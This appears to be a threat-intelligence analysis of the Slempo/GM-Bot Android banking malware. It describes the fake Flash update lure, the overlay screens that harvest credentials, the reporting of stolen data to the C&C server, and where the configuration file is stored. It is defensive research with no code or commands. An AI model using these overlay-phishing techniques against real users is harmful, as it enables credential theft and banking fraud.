Slempo/GM-Bot requires little introduction, as it has been the focal point of many recentpublications, and is a well known threat in the world of mobile malware.
In most cases Slempo/GM-bot presents itself as “Adobe Flash Player Update”, this disguise is very popular in the mobile malware sphere, and used in order to trick the user into granting the malicious application administrator privileges.
Upon the user’s acceptance the malware is installed on the device and is capable of controlling it. Among the malware’s many functionalities are:
Intercept, redirect and block SMS messages and calls
Lock and unlock the device
Wipe the device
Display it’s own content over legitimate applications
Send stolen user credentials (obtained by displaying fake content) back to the Command & Control server.
After completing initial installation, the malware will contact its Command & Control server, send it a list of all applications installed on the device and various other device information, and will download a configuration file which it will save locally on the device at the following path: /data/data/%App_Name%/shared_prefs/AppPrefs.xml
This configuration file contains the applications that the malware targets for credential harvesting, and the fraudulent content that performs that harvesting.
Fig. 1 – Device data and installed applications sent to C&C server.
Encoded Configuration & Fraudulent Activity
The encoded configuration file which is downloaded from the Command & Control server contains the targeted application names and content to be displayed to the victim upon activation of a targeted application, as can be seen below:
Fig. 2 – A snippet of the encoded configuration file
Fig. 3 – Decoded configuration snippet showing fraudulent HTML content to be displayed on top of the targeted application and harvest user’s credentials.
When the malware detects activation of a targeted application, the fraudulent content contained in the configuration file is displayed to the victim on-top of the targeted application:
Fig. 4 – Fraudulent content displayed on top of legitimate application.
After entering his credentials into what the victim perceives to be the legitimate application, the malware then sends the credentials to its C&C server, as seen below:
Fig. 5: Victim’s credentials are sent to the C&C server.
Slempo targets many various financial and non-financial applications worldwide, as can be seen in the chart below:
Fig. 5: Slempo Target Distribution.
NOTE: Applications which are not region or country specific are categorized as “Other”.